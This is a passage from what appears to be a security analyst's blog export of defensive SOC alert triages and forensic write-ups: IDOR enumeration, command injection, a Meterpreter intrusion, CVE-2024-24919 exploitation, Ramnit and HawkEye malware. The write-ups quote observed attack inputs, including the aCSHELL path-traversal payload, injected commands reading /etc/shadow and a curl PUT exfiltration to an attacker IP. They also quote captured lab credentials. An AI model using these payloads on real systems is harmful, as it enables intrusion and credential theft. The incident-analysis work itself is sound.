134.209.118.137 8HTTP Request Method : POST 9Requested URL : https://172.16.17.15/get_user_info/ 10User-Agent : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) 11Alert Trigger Reason : consecutive requests to the same page 12Device Action : Allowed Identification # Is the traffic coming from outside? # The source IP 134.209.118.137 is an external address belonging to DigitalOcean LLC (AS14061), located in North Bergen, New Jersey. The destination 172.16.17.15 is an internal address. The traffic is inbound from outside the network.\nIs the source malicious? # AbuseIPDB reported the IP 1,536 times with a confidence of abuse of 0%, indicating it is a known DigitalOcean hosting address with no confirmed malicious history.\nVirusTotal returned 0/94 detections — no security vendor flagged the IP as malicious.\nAlthough both sources return clean results, the IP belongs to a cloud hosting provider, which is commonly used to launch attacks anonymously. The repetitive request pattern is the primary indicator here.\nWhat type of attack was attempted? # Firewall logs show five consecutive inbound connections from 134.209.118.137 to 172.16.17.15:443 between 10:45 PM and 10:48 PM, all on different source ports, where each request contained a unique parameter: ?user_id=1, ?user_id=2, ?user_id=3, ?user_id=4, and ?user_id=5. 1Request URL: https://172.16.17.15/get_user_info/ 2User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) 3Request Method: POST 4Device Action: Permitted 5HTTP Response Size: 253 6HTTP Response Status: 200 7POST Parameters: ?user_id=2 Insecure Direct Object Reference (IDOR) is an access control vulnerability where an attacker manipulates object references - such as user IDs in a URL or request body - to access data belonging to other users. The endpoint /get_user_info/ is a target for this type of enumeration. The consecutive POST requests from a single external IP suggest the attacker was iterating through user identifiers to extract account data without authorization.\nDid anyone else get targeted? # All connections targeted the same destination - only 172.16.17.15 was affected. Did the attack succeed? # I examined the HTTP response data for each of the five requests. All five requests returned HTTP 200 with differing response body sizes. I concluded the attack succeeded and that data for all five queried accounts was exfiltrated.\nTriage Decision # True Positive. An external cloud IP sent repeated automated POST requests to a user data endpoint. The firewall allowed all traffic and the endpoint was exposed. The attack pattern is consistent with IDOR enumeration.\nWhat is the impact level? # High. If the /get_user_info/ endpoint does not enforce proper authorization checks, the attacker may have successfully retrieved account data for multiple users. The endpoint handles user information and was accessible without restriction from an external IP.\nContainment # Is the attacker still active? # The last logged connection was at 10:48 PM on Feb 28, 2022. No additional logs were observed after this timestamp. The attacker may have completed the enumeration or moved on, but the IP has not been blocked.\nIs the vulnerable endpoint still exposed? # Yes. The /get_user_info/ endpoint remains accessible from external IPs with no firewall restriction in place.\nActions taken # 134.209.118.137 was blocked at the firewall level. The /get_user_info/ endpoint was flagged for the application security team.\nIOCs # Type Value Source IP 134.209.118[.]137 Firewall logs URL hxxps://172.16.17[.]15/get_user_info/ Alert User-Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Alert ","date":"April 2, 2026","externalUrl":null,"permalink":"/blue_team/ld-idor/","section":"","summary":"External IP enumerated the /get_user_info/ endpoint via sequential IDOR requests, all returning HTTP 200 - confirming successful data exfiltration across five user accounts.","title":"LD-Possible IDOR Attack Detected","type":"blue_team"},{"content":" Alert # 1EventID : 118 2Event Time : Feb, 28, 2022, 04:12 AM 3Rule : SOC168 - Whoami Command Detected in Request Body 4Level : Security Analyst 5Hostname : WebServer1004 6Destination IP Address : 172.16.17.16 7Source IP Address : 61.177.172.87 8HTTP Request Method : POST 9Requested URL : https://172.16.17.16/video/ 10User-Agent : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 11Alert Trigger Reason : Request Body Contains whoami string 12Device Action : Allowed Identification # Is the traffic coming from outside? # The source IP 61.177.172.87 falls outside any RFC 1918 private range and resolves to CHINANET Jiangsu Province Network (AS4134, Nanjing, China). Traffic direction is Internet to Company Network. This was confirmed not to be a planned penetration test.\nIs the source malicious? # I checked 61.177.172.87 on AbuseIPDB - the IP has been reported 86,782 times with a Confidence of Abuse of 0%, indicating high historical noise but no active campaign score.\nVirusTotal flagged the IP as malicious by 4/94 vendors. Community score is -1.\nWhat type of attack was attempted? # The attacker exploited a command injection vulnerability on the /video/ endpoint by passing OS commands through the ?c= POST parameter. Command injection occurs when user-supplied input is passed unsanitized to a system shell, allowing arbitrary command execution in the context of the web server process. The attacker ran five commands in sequence - ls, whoami, uname, cat /etc/passwd, and cat /etc/shadow. The use of a spoofed legacy User-Agent (MSIE 6.0 / Windows NT 5.1) indicates deliberate evasion.\nDid anyone else get targeted? # Reviewing the firewall logs, all five requests were directed exclusively at 172.16.17.16:443. No other destination addresses appeared in the log window and no lateral movement was observed.\nDid the attack succeed? # Yes. All five POST requests returned HTTP 200 with varying response sizes ranging from 910 to 1501 bytes, consistent with the server executing each command and returning its output.\nTriage Decision # What is the impact level? # The attacker achieved confirmed remote code execution on 172.16.17.16 (WebServer1004), successfully reading both /etc/passwd and /etc/shadow. Combined with the whoami and uname output, the attacker obtained a full OS fingerprint and the privilege context of the web process. Escalated to Tier 2.\nContainment # Is the attacker still active? # The last observed request from 61.177.172.87 was at 04:15 AM on Feb 28, 2022. No further entries appeared in the log window beyond that timestamp. The IP was blocked at the perimeter firewall to prevent any follow-up connection attempts.\nIs the vulnerable endpoint still exposed? # The /video/ endpoint on 172.16.17.16 was passing the ?c= parameter directly to the system shell with no sanitization or allowlist enforcement. The endpoint was taken offline pending a code-level fix. Input validation restricting the ?c= parameter to expected values was flagged as mandatory before redeployment.\nActions taken # 61.177.172.87 was blocked at the perimeter firewall. 172.16.17.16 was isolated from external access and escalated to Tier 2 for credential rotation on all accounts present in the dumped /etc/passwd and /etc/shadow files.\nIOCs # IPs\n- 61.177.172.87 - attacker IP\nHosts\n- 172.16.17.16 (WebServer1004) - compromised web server\nRequests\n- ?c=ls - ?c=whoami - ?c=uname - ?c=cat /etc/passwd - ?c=cat /etc/shadow\nUser-Agents\n- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) - spoofed legacy User-Agent used across all requests\n","date":"April 2, 2026","externalUrl":null,"permalink":"/blue_team/ld-whoami-command-detected-in-request-body/","section":"","summary":"An external attacker from a CHINANET-hosted IP (61.177.172.87) exploited a command injection vulnerability on WebServer1004, executing five OS commands via the ?c= parameter against /video/ - including cat /etc/passwd and cat /etc/shadow - all of which returned HTTP 200 with distinct response sizes, confirming successful remote code execution. The case was escalated to Tier 2.","title":"LD-Whoami Command Detected in Request Body","type":"blue_team"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/lfi/","section":"Tags","summary":"","title":"LFI","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/no-escalation/","section":"Tags","summary":"","title":"No Escalation","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/path-traversal/","section":"Tags","summary":"","title":"Path Traversal","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/rce/","section":"Tags","summary":"","title":"RCE","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/xss/","section":"Tags","summary":"","title":"XSS","type":"tags"},{"content":" TL;DR # A phishing document delivered via download triggered a multi-stage infection chain on host 192.168.10.15 (HD-FIN-03). The malicious Word document important_instructions.docx dropped FSETPBEUsIek.exe, which spawned cmd.exe, wrote and executed a VBS script, used cscript.exe to drop a secondary executable, injected a thread into notepad.exe. The attacker established persistence via a registry Run key pointing to a VBS file in C:\\Windows\\TEMP. A second compromised host 192.168.10.29 later exfiltrated sami.xls to the attacker IP 192.20.80.25 via HTTP PUT. Suricata detected Metasploit metsrv.x86.dll payloads in traffic to both victim hosts.\nInitial Triage # The investigation started with a broad overview of all events in IBM QRadar - a SIEM platform that aggregates logs from multiple sources, correlates them into offenses, and assigns magnitude scores based on severity and relevance. I began by examining the Top 10 Event Name Results by Count to understand the distribution of event types across the timeframe.\nTo focus on the most critical events, I filtered by Magnitude to surface the highest-severity correlated events.\nThe filtered view surfaced NIDS Alerts from SO-Suricata with the highest magnitude scores, alongside Module Logging Command Invocation, PowerShell Console events, and a QRadar custom rule hit for Exploit Followed by Suspicious Host Activity - Chained. I started with the Suricata alerts as they indicated active network-level exploitation.\nReviewing the connections view confirmed three victim IPs communicating with the attacker 192.20.80.25 192.168.10.29, and revealed a second Suricata hit on Nov 9, 2020 targeting 192.168.20.20 (DC) - suggesting the attacker pivoted after the initial compromise.\nInitial Access # The Suricata NIDS alert at Nov 8, 2020, 22:30:49 triggered on traffic between 192.20.80.25 (attacker) and 192.168.10.15 (patient zero, HD-FIN-03):\n1ET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server) 2Category: A Network Trojan was detected Examining the payload, the UTF view revealed metsrv.x86.dll and ReflectiveLoader strings - confirming this is a Metasploit Meterpreter reverse shell payload delivered as a reflectively-loaded DLL.\nExecution Chain # Pivoting to process creation events on 192.168.10.15 and sorting chronologically revealed the full execution chain. At 22:30:03 WINWORD.EXE launched with the following command:\n1\u0026#34;C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE\u0026#34; /n 2\u0026#34;C:\\Users\\nour.HACKDEFEND\\Downloads\\important_instructions.docx\u0026#34; /o \u0026#34;\u0026#34; The user nour opened important_instructions.docx (MD5: 9D08221599FCD9D35D11F9CBD6A0DEA3) from the Downloads folder. The /o \u0026quot;\u0026quot; flag suppresses the splash screen, consistent with a document that auto-executes a macro on open. At 22:30:51 - 48 seconds after Word launched - a new process was created directly in the user\u0026rsquo;s profile directory:\n1C:\\Users\\nour.HACKDEFEND\\FSETPBEUsIek.exe 2MD5: 6F37EB2B7F6720B48588FB2B84ED17C8 The random-looking name FSETPBEUsIek.exe dropped directly into the user\u0026rsquo;s home folder is a strong indicator of a VBA macro dropper - Word macros commonly write and execute payloads to the current user\u0026rsquo;s directory without requiring elevated privileges.\nAt 22:32:37 FSETPBEUsIek.exe spawned cmd.exe:\n1C:\\Windows\\system32\\cmd.exe 2CurrentDirectory: C:\\Users\\nour.HACKDEFEND\\ 3User: HACKDEFEND\\nour At 22:35:04 the executable wrote and executed a VBS script:\n1FSETPBEUsIek.exe → C:\\Users\\NOUR~1.HAC\\AppData\\Local\\Temp\\uCOadJlMb.vbs At 22:35:17 cscript.exe executed the VBS script, which in turn dropped a secondary executable:\n1C:\\Windows\\SysWOW64\\cscript.exe 2TargetFilename: C:\\Users\\NOUR~1.HAC\\AppData\\Local\\Temp\\radD54BD.tmp\\FaFRuwJIlNvBNaT.exe Process Injection and Privilege Escalation # At 22:35:37 a CreateRemoteThread event was logged - a process injects a thread into another process, which is the primary mechanism used by Meterpreter to migrate into a less suspicious host process:\n1Source: C:\\Users\\nour.HACKDEFEND\\FSETPBEUsIek.exe 2Target: C:\\Windows\\SysWOW64\\notepad.exe By injecting into notepad.exe, the malware migrated its execution context into a trusted Windows process. At 22:35:46 - nine seconds after the injection - a Success Audit: An account was successfully logged on event fired with AccountName: SYSTEM, confirming the injected code successfully escalated privileges to SYSTEM.\nLateral Movement and Persistence # On Nov 9, 2020, 09:51:45 Suricata fired a second Metasploit payload alert - this time with source 192.20.80.25 and destination 192.168.20.20 (the Domain Controller), confirming the attacker pivoted laterally from HD-FIN-03 to the DC.\nShortly after, at 09:53:39, a Sysmon RegistryEvent (Value Set) (Event ID 13) was logged on the DC:\n1Image: C:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe 2Target Object: HKU\\DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SsGHOMcjsj 3Target Details: C:\\Windows\\TEMP\\PjvQTe.vbs The attacker used PowerShell to write a VBS file path into the HKCU\\...\\Run registry key under the DEFAULT user hive.\nExfiltration # Filtering events for the second victim host 192.168.10.29 and the attacker IP revealed a Suricata alert at Nov 9, 2020, 10:29:52:\n1ET INFO Dotted Quad Host XLSX Request 2ET POLICY curl User-Agent Outbound Examining the payload of the associated HTTP connection confirmed active exfiltration:\n1PUT /sami.xlsx 2Host: 192.20.80.25 3User-Agent: curl/7.55.1 4Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet 5request_body_len: 43062 The attacker used curl to upload sami.xlsx (43 KB) via HTTP PUT directly to their server at 192.20.80.25. The curl User-Agent and dotted-quad host in a spreadsheet request are both highly anomalous and were correctly flagged by Suricata.\nIOCs # IPs\n- 192.20.80.25 - attacker IP and Metasploit C2 server\n- 192.168.10.15 - patient zero (HD-FIN-03, user nour)\n- 192.168.10.29 - second compromised host (exfiltration source)\n- 192.168.20.20 - Domain Controller (lateral movement target, persistence established)\nFiles\n- important_instructions.doc - MD5:9D08221599FCD9D35D11F9CBD6A0DEA3 - C:\\Users\\nour.HACKDEFEND\\FSETPBEUsIek.exe - MD5:6F37EB2B7F6720B48588FB2B84ED17C8\n- C:\\Users\\NOUR1.HAC\\AppData\\Local\\Temp\\uCOadJlMb.vbs - VBS dropper\n- C:\\Users\\NOUR1.HAC\\AppData\\Local\\Temp\\radD54BD.tmp\\FaFRuwJIlNvBNaT.exe - secondary payload\n- C:\\Windows\\TEMP\\PjvQTe.vbs - persistence VBS script\n- sami.xlsx - exfiltrated file Registry\n- HKU\\DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SsGHOMcjsj - persistence key\nAccounts\n- HACKDEFEND\\nour - compromised user account\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef inject fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef c2 fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef start fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; A([nour - 192.168.10.15HD-FIN-03]):::start --\u003e B[Nov 8 22:30:03 - WINWORD.EXE openedimportant_instructions.docxMD5: 9D08221599FCD9D35D11F9CBD6A0DEA3]:::access B --\u003e C[Nov 8 22:30:51 - VBA macro dropsFSETPBEUsIek.exeMD5: 6F37EB2B7F6720B48588FB2B84ED17C8]:::exec C --\u003e D[Nov 8 22:32:37 - cmd.exe spawned]:::exec C --\u003e E[Nov 8 22:35:04 - VBS writtenuCOadJlMb.vbs]:::exec E --\u003e F[Nov 8 22:35:17 - cscript.exe dropsFaFRuwJIlNvBNaT.exe]:::exec subgraph Injection [Injection and Escalation] F --\u003e G[Nov 8 22:35:37 - CreateRemoteThreadinject into notepad.exe]:::inject G --\u003e H[Nov 8 22:35:46 - SYSTEM logon confirmed]:::inject H --\u003e I[Nov 8 22:30:49 - Suricatametsrv.x86.dll detected192.20.80.25 to 192.168.10.15]:::c2 end subgraph Lateral [Lateral Movement and Persistence] I --\u003e J[Nov 9 09:51:45 - SuricataMetasploit payload192.20.80.25 to DC 192.168.20.20]:::persist J --\u003e K[Nov 9 09:53:39 - Registry Run keyHKU\\DEFAULT\\...\\Run\\SsGHOMcjsjC:\\Windows\\TEMP\\PjvQTe.vbs]:::persist end subgraph Exfil [Exfiltration] K --\u003e L[Nov 9 10:29:52 - curl PUT /sami.xlsx192.168.10.29 to 192.20.80.2543062 bytes]:::exfil end ","date":"April 1, 2026","externalUrl":null,"permalink":"/blue_team/cdef-qradar101/","section":"","summary":"A user opened a malicious Word document that dropped FSETPBEUsIek.exe, which spawned a VBS script, injected into notepad.exe, established persistence via registry Run key, exfiltrated sami.xlsx to an attacker-controlled server, and triggered a Metasploit reverse shell detected by Suricata.","title":"CDEF-Qradar101","type":"blue_team"},{"content":"","date":"April 1, 2026","externalUrl":null,"permalink":"/tags/qradar/","section":"Tags","summary":"","title":"Qradar","type":"tags"},{"content":"","date":"March 31, 2026","externalUrl":null,"permalink":"/tags/cve-2024-24919/","section":"Tags","summary":"","title":"CVE-2024-24919","type":"tags"},{"content":" Alert # 1EventID: 263 2Severity: High 3Event Time: Jun, 06, 2024, 03:12 PM 4Rule: SOC287 - Arbitrary File Read on Checkpoint Security Gateway [CVE-2024-24919] 5Level: Security Analyst 6Hostname: CP-Spark-Gateway-01 7Destination IP Address: 172.16.20.146 8Source IP Address: 203.160.68.12 9HTTP Request Method: POST 10Requested URL: 172.16.20.146/clients/MyCRL 11Request: aCSHELL/../../../../../../../../../../etc/passwd 12User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 13Alert Trigger Reason: Characteristics exploit pattern Detected on Request, indicative exploitation of the CVE-2024-24919. 14Device Action: Allowed CVE-2024-24919 # CVE-2024-24919 is a path traversal vulnerability in Check Point Security Gateway. It allows an unauthenticated attacker to read arbitrary files from the filesystem by sending a crafted POST request to the /clients/MyCRL endpoint with a path traversal sequence prefixed by aCSHELL/. The vulnerability was actively exploited in the wild shortly after disclosure, with attackers primarily targeting /etc/passwd and /etc/shadow to extract credentials for VPN accounts.\nIdentification # Is the traffic coming from outside? # The source IP 203.160.68.12 is an external address originating outside the corporate network. Traffic direction is Internet to Company Network. This was confirmed not to be a planned penetration test.\nIs the source malicious? # I checked 203.160.68.12 on AbuseIPDB - the IP belongs to China Unicom (Hong Kong) Operations Limited. It has been reported 2 times with 0% Confidence of Abuse. VirusTotal flagged the IP as malicious by 2/94 vendors - Forcepoint ThreatSeeker and Webroot both classify it as malicious, with alphaMountain.ai rating it suspicious.\nWhat type of attack was attempted? # The alert triggered on a POST request to /clients/MyCRL with the body aCSHELL/../../../../../../../../../../etc/passwd - a textbook CVE-2024-24919 exploitation attempt. The aCSHELL/ prefix is required by the vulnerable endpoint\u0026rsquo;s parsing logic, after which the path traversal sequence ../../../../../../../../../../ climbs to the filesystem root and reads /etc/passwd. This file contains the list of all system accounts and is the primary target for initial credential harvesting on Unix-based systems.\nDid anyone else get targeted? # Reviewing the firewall logs and access log, I identified a second attacker IP - 203.160.68.13 - in the same /19 subnet as the primary attacker. At 15:14:02 this IP submitted an identical exploit request targeting /etc/shadow, which stores hashed passwords. This request returned HTTP 403 and was blocked.\nThe coordinated use of two IPs from the same subnet within two minutes suggests a single threat actor using multiple egress points.\nDid the attack succeed? # Yes. The access log confirms the initial request from 203.160.68.12 at 15:12:45 returned HTTP 200 with a response size of 1256 bytes - larger than a typical error response, indicating the server returned the contents of /etc/passwd. The subsequent POST to / at 15:15:01 also returned HTTP 200, suggesting the attacker sent a follow-up request after the successful file read.\n1203.160.68.12 \u0026#34;POST /clients/MyCRL HTTP/1.1\u0026#34; 200 1256 \u0026#34;aCSHELL/../../../../../../../../../../etc/passwd\u0026#34; 2203.160.68.13 \u0026#34;POST /clients/MyCRL HTTP/1.1\u0026#34; 403 314 \u0026#34;aCSHELL/../../../../../../../../../../etc/shadow\u0026#34; 3203.160.68.12 \u0026#34;POST / HTTP/1.1\u0026#34; 200 512 Triage Decision # What is the impact level? # The attacker successfully read /etc/passwd from the Check Point Security Gateway 172.16.20.146, obtaining the full list of system and VPN accounts. A second attacker IP from the same subnet attempted to read /etc/shadow but was blocked. The gateway is a network security device - credential exposure at this level could enable VPN account compromise and lateral movement into the internal network. Escalated to Tier 2.\nContainment # Is the attacker still active? # The last observed request from the attacker IPs was at 15:15:01. The OS log entry at 15:30 PM shows a local loopback event on 172.16.20.146 with no associated external traffic, so no active attacker connection was present at that time. Both IPs 203.160.68.12 and 203.160.68.13 were blocked at the perimeter firewall.\nIs the vulnerable endpoint still exposed? # The /clients/MyCRL endpoint on 172.16.20.146 remains vulnerable until the Check Point hotfix for CVE-2024-24919 is applied. The gateway was isolated from external access pending patching and the case was escalated to Tier 2 for credential rotation on all accounts present in the dumped /etc/passwd file.\nIOCs # IPs\n- 203.160.68.12 - primary attacker IP - 203.160.68.13 - secondary attacker IP\nEndpoints\n- 172.16.20.146` (CP-Spark-Gateway-01) - compromised Check Point Security Gateway\nRequests\n- aCSHELL/../../../../../../../../../../etc/passwd - successful file read payload\n- aCSHELL/../../../../../../../../../../etc/shadow - blocked file read attempt\n","date":"March 31, 2026","externalUrl":null,"permalink":"/blue_team/ld-arbitrary-file-read-on-checkpoint-security-gateway-cve-2024-24919/","section":"","summary":"An attacker exploited CVE-2024-24919 against a Check Point Security Gateway, successfully reading /etc/passwd via a path traversal payload. A second request targeting /etc/shadow from a related IP was blocked. The attack succeeded and the endpoint was escalated to Tier 2.","title":"LD-Arbitrary File Read on Checkpoint Security Gateway (CVE-2024-24919)","type":"blue_team"},{"content":" Difficulty: Easy OS: Windows Date: 2026-03-30 TL;DR # A Windows memory image was provided for analysis. Process enumeration revealed a suspicious ChromeSetup.exe process spawned under explorer.exe, indicating direct user-context execution rather than a legitimate installer flow. Network scan output showed ChromeSetup.exe initiating an outbound connection to 58.64.204.181:5202 in Hong Kong. The process was dumped from memory and submitted to VirusTotal, where it was flagged by 68/72 vendors as Ramnit - a worm and credential-stealing trojan.\nProcess Analysis # I started by running windows.pslist against the memory image using Volatility 3.\nThe process list showed ChromeSetup.exe (PID 4628) as a child of explorer.exe (PID 4568).\nNetwork Analysis # With a suspicious process identified, I ran windows.netscan to enumerate active and recently closed network connections and correlate them with running processes\nChromeSetup.exe had an active outbound connection in state SYN_SENT to 58.64.204.181:5202 at 19:48:51 UTC - one second after the process started. SYN_SENT means the TCP handshake was initiated but not yet completed at the moment of memory capture, indicating the malware was actively attempting to reach its C2 server. Port 5202 is non-standard and has no legitimate association with Chrome.\nI checked the destination IP - 58.64.204.181 resolves to NWT IDC Data Service, Hong Kong. There is no legitimate reason for a Chrome installer to connect to a Hong Kong data center IP on a non-standard port. File Extraction and Identification # With the process confirmed as suspicious through both process tree anomalies and network behavior, I dumped the executable from memory using windows.dumpfiles targeting PID 4628\nThe dumped file file.0xca82b85325a0.0xca82b7e06c80.ImageSectionObject.ChromeSetup.exe.img was submitted to VirusTotal by MD5 hash 11318cc3a3613fb679e25973a0a701fc.\n68 out of 72 vendors flagged the file as malicious. The popular threat label is virus.nimnul/vjadtre, with family labels including nimnul, vjadtre, and wapomi. Threat categories are listed as virus and trojan. VirusTotal behavior tags include persistence, spreader, checks-network-adapters, and detect-debug-environmen` - consistent with Ramnit\u0026rsquo;s known behavior of infecting executables on the local filesystem, spreading via removable drives, and establishing persistent C2 communication.\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef action fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef c2 fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef start fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; A([Userexplorer.exe PID 4568]):::start --\u003e B[2024-02-01 19:48:50 UTCChromeSetup.exe launchedPID 4628 - 32-bit - Wow64]:::action B --\u003e C[2024-02-01 19:48:51 UTCSYN_SENT to 58.64.204.181:5202NWT IDC Data Service - Hong Kong]:::c2 C --\u003e D([Ramnit C2 beaconvirus.nimnul/vjadtre68/72 VirusTotal vendors]):::c2 IOCs # IPs\n- 58.64.204.181 - Ramnit C2 server (Hong Kong, port 5202)\nFiles\n- ChromeSetup.exe - Ramnit worm masquerading as Chrome installer\n- MD5: 11318cc3a3613fb679e25973a0a701fc\n- SHA256: 1ac890f5fa78c857de42a112983357b0892537b73223d7ec1e1f43f8fc6b7496\nProcesses\n- PID 4628 ChromeSetup.exe - malicious process under explorer.exe PID 4568\nPorts\n- 5202/TCP - non-standard C2 communication port\n","date":"March 30, 2026","externalUrl":null,"permalink":"/investigations/cdef-ramnit/","section":"","summary":"Memory forensics of a compromised Windows host revealed ChromeSetup.exe spawned under explorer.exe, establishing a C2 connection to a Hong Kong-based IP. The dumped binary was identified as the Ramnit worm - flagged by 68/72 VirusTotal vendors.","title":"CDEF-Ramnit","type":"investigations"},{"content":"","date":"March 30, 2026","externalUrl":null,"permalink":"/tags/endpoint-forensic/","section":"Tags","summary":"","title":"Endpoint Forensic","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-03-18 TL;DR # A victim host at 10.4.10.132 downloaded a malicious executable via HTTP from an OVH-hosted server in France. The file was a HawkEye Keylogger - Reborn v9 dropper, detected by 58 out of 72 vendors on VirusTotal. After execution, the malware periodically beaconed to bot.whatismyipaddress.com to retrieve the victim\u0026rsquo;s external IP, and exfiltrated harvested credentials every 10 minutes via SMTP to an attacker-controlled inbox at macwinlogistics.in.\nInitial Analysis # The capture contains 4003 frames. TCP dominates at 93.3% of packets. Two protocols stood out as relevant to a investigation — HTTP (0.4% of packets but 84.8% of bytes, indicating a large file transfer) and SMTP (3.7% of packets, suggesting email activity). I decided to start with HTTP since the large byte ratio suggested a file download.\nMalware Download # I found a GET request from the victim 10.4.10.132 to 217.182.138.150:\n1GET /proforma/tkraw_Protected99.exe HTTP/1.1 The server responded with HTTP/1.1 200 OK and Content-Type: application/x-msdownload, confirming a successful executable download.\nI looked up the source IP 217.182.138.150 on AbuseIPDB - it was not found in their database, but the IP belongs to OVH SAS, a French hosting provider, located in Dunkerque, France. Attacker infrastructure hosted on VPS/hosting providers like OVH is common for malware distribution.\nI then submitted the file hash to VirusTotal:\n1MD5: 71826ba081e303866ce2a2534491a2f7 2File: tkraw_Protected99.exe (1.93 MB) 58 out of 72 security vendors flagged it as malicious. The popular threat label is trojan.autoit/gen8, with family labels including hawkeye - confirming this is a HawkEye Keylogger dropper packed with AutoIt. VirusTotal behavior tags include persistence, clipboard, checks-network-adapters, detect-debug-environment and long-sleeps - consistent with a keylogger.\nBeaconing Behavior # After the download, filtering HTTP traffic revealed a recurring pattern - every 10 minutes, 10.4.10.132 sent a GET / request to 66.171.248.178.\n1GET / HTTP/1.1 2Host: bot.whatismyipaddress.com 3Connection: Keep-Alive The server responded with the victim\u0026rsquo;s external IP address - 173.66.146.112. This is a common technique used by malware to determine the public IP of the infected machine before exfiltration, allowing the attacker to correlate the victim\u0026rsquo;s identity.\nData Exfiltration # Switching focus to SMTP traffic, I followed the TCP streams on port 25 connections going to 23.229.162.69. The captured SMTP session revealed the attacker\u0026rsquo;s exfiltration channel:\n1From: sales.del@macwinlogistics.in 2To: sales.del@macwinlogistics.in 3Content-Transfer-Encoding: base64 The credentials used to authenticate to the SMTP server: Sales@23. The email body was base64-encoded - after decoding, the content confirmed the malware identity and revealed stolen credentials:\n1HawkEye Keylogger - Reborn v9 2Passwords Logs 3roman.mcguire \\ BEIJING-5CD1-PC 4 5URL : https://login.aol.com/account/challenge/password 6Web Browser : Internet Explorer 7.0 - 9.0 7User Name : roman.mcguire914@aol.com 8Password : P@ssw0rd$ 9Password Strength : Very Strong 10... The malware exfiltrated keylogger output - including saved browser credentials - every 10 minutes, sending them to the attacker-controlled inbox sales.del@macwinlogistics.in.\nIOCs # IPs\n- 217.182.138.150 — malware distribution server (OVH SAS, France)\n- 66.171.248.178 — bot.whatismyipaddress.com — IP beacon target\n- 23.229.162.69 — SMTP exfiltration server\nFiles\n- tkraw_Protected99.exe — HawkEye Keylogger Reborn v9 dropper\n- MD5: 71826ba081e303866ce2a2534491a2f7\n- SHA256: 62099532750dad1054b127689680c38590033fa0bdfa4fb40c7b4dcb2607fb11\nAccounts\n- sales.del@macwinlogistics.in — attacker SMTP inbox\n- roman.mcguire914@aol.com — stolen credential\nCredentials\n- SMTP password: Sales@23\n- Stolen AOL password: P@ssw0rd$\nRecommendations # Immediate Actions\nIsolate host 10.4.10.132 from the network Block IP 217.182.138.150 and domain macwinlogistics.in at the perimeter Reset all credentials for user`roman.mcguire across all services Scan all hosts on the 10.4.10.0/24 subnet for the same IOCs Preventive Measures\nDeploy email filtering to block outbound SMTP to unauthorized servers Block outbound connections to IP-lookup services like bot.whatismyipaddress.co Enable EDR to detect AutoIt-based droppers at execution time Restrict executable downloads via web proxy - block application/x-msdownloa` from unknown hosts Enable MFA on all user email accounts to limit impact of stolen credentials Attack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef action fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef start fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; A([10.4.10.132Victim Host]):::start --\u003e B[2019-04-10 20:37:54HTTP GET tkraw_Protected99.exefrom 217.182.138.150]:::access B --\u003e C[2019-04-10 20:38:15File downloadedapplication/x-msdownload]:::action subgraph Beaconing [Beaconing — every 10 minutes] C --\u003e D[GET bot.whatismyipaddress.comReturns external IP 173.66.146.112]:::persist end subgraph Exfiltration [Exfiltration — every 10 minutes] D --\u003e E[SMTP to 23.229.162.69sales.del@macwinlogistics.inBase64-encoded credentials]:::exfil E --\u003e F([HawkEye Keylogger Reborn v9Stolen: roman.mcguire914@aol.comP@ssw0rd$]):::exfil end ","date":"March 25, 